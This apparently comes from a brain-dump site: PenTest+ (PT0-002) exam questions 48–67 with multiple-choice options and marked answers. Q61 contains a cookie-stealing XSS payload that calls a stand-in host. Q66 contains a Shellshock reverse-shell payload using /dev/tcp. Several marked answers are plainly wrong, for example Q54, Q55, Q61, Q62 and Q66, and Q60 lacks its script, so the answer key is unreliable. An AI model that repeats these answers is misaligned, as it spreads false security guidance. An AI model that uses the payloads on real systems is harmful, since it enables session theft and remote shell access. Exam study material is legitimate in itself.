[Dec 08, 2021] PT0-002 Exam Brain Dumps - Study Notes and Theory [Q48-Q67]

NEW QUESTION 48
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. To validate the billing information with the client
  • B. As proof in case they are discovered
  • C. As backup in case the original documents are lost
  • D. To guide them through the building entrances

Answer: B

 

NEW QUESTION 49
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

  • A. nmap -f -sV -p80 192.168.1.20
  • B. nmap -O -v -p80 192.168.1.20
  • C. nmap -A -T4 -p80 192.168.1.20
  • D. nmap -sS -sL -p80 192.168.1.20

Answer: C

 

NEW QUESTION 50
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Performing spear phishing against employees by posing as senior management
  • B. Attempting to tailgate an employee going into the client's workplace
  • C. Using a brute-force attack against the external perimeter to gain a foothold
  • D. Dropping a malicious USB key with the company's logo in the parking lot

Answer: C

 

NEW QUESTION 51
Which of the following BEST describe the OWASP Top 10? (Choose two.)

  • A. The most critical risks of web applications
  • B. A risk-governance and compliance framework
  • C. The risks defined in order of importance
  • D. A list of all the risks of web applications
  • E. A checklist of Apache vulnerabilities
  • F. A web-application security standard

Answer: A,C

 

NEW QUESTION 52
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

  • A. NDA
  • B. SOW
  • C. MSA
  • D. MOU

Answer: B

 

NEW QUESTION 53
A company that develops embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

  • A. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
  • B. The reverse-engineering team will be given access to source code for analysis.
  • C. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
  • D. The reverse-engineering team may have a history of selling exploits to third parties.

Answer: B

 

NEW QUESTION 54
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

  • A. Data flooding
  • B. Session riding
  • C. Cybersquatting
  • D. Side channel

Answer: B

 

NEW QUESTION 55
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Quarterly
  • B. Weekly
  • C. Annually
  • D. Monthly

Answer: B

 

NEW QUESTION 56
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?

  • A. The planning process failed to ensure all teams were notified
  • B. The penetration tester had incorrect contact information
  • C. The penetration tester was testing the wrong assets
  • D. The client was not ready for the assessment to start

Answer: A

 

NEW QUESTION 57
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  • A. The CVSS score of the finding
  • B. The name of the person who found the flaw
  • C. The vulnerability identifier
  • D. The network location of the vulnerable device
  • E. The tool used to find the issue
  • F. The client acceptance form

Answer: C,E

 

NEW QUESTION 58
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

  • A. OWASP Web Security Testing Guide
  • B. NIST SP 800-115
  • C. OSSTMM
  • D. PTES technical guidelines

Answer: D

 

NEW QUESTION 59
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

  • A. Document the unprotected file repository as a finding in the penetration-testing report.
  • B. Recommend using a password manager/vault instead of text files to store passwords securely.
  • C. Create a custom password dictionary as preparation for password spray testing.
  • D. Recommend configuring password complexity rules in all the systems and applications.

Answer: A

 

NEW QUESTION 60
A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

  • A. Determine active hosts on the network.
  • B. Set the TTL of ping packets for stealth.
  • C. Scan the system on the most used ports.
  • D. Fill the ARP table of the networked devices.

Answer: A

 

NEW QUESTION 61
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Parameterized queries
  • B. Output encoding
  • C. Base64 encoding
  • D. Web-application firewall
  • E. Input validation
  • F. Session tokens

Answer: A,F

 

NEW QUESTION 62
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

  • A. Perform fuzz testing of compiled binaries.
  • B. Add a dependency checker into the tool chain.
  • C. Validate API security settings before deployment.
  • D. Perform routine static and dynamic analysis of committed code.

Answer: A

 

NEW QUESTION 63
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv -sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • B. nmap -vv -sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv -sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • D. nmap -vv -sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

Answer: C

 

NEW QUESTION 64
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

  • A. OpenVAS
  • B. OWASP ZAP
  • C. Drozer
  • D. Burp Suite

Answer: A

 

NEW QUESTION 65
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

  • A. The expected time frame of the assessment
  • B. A signed statement of work
  • C. The correct user accounts and associated passwords
  • D. The proper emergency contacts for the client

Answer: A

 

NEW QUESTION 66
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: B

 

NEW QUESTION 67
......
